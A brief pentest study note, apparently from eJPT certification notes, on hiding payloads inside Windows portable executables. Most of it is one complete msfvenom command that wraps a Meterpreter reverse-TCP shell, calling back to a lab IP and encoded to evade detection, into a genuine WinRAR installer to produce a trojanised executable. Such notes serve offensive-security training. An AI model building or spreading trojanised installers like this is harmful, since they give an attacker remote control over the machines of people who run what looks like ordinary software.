Injecting Payloads into PEs
#Injecting Payloads into PEs
🗒️ Windows Portable Executable (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.
Download a portable executable,
e.g.
WinRARPayloads can be injected into PEs with
msfvenom
with the-x
and-k
options
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.exe

Last updated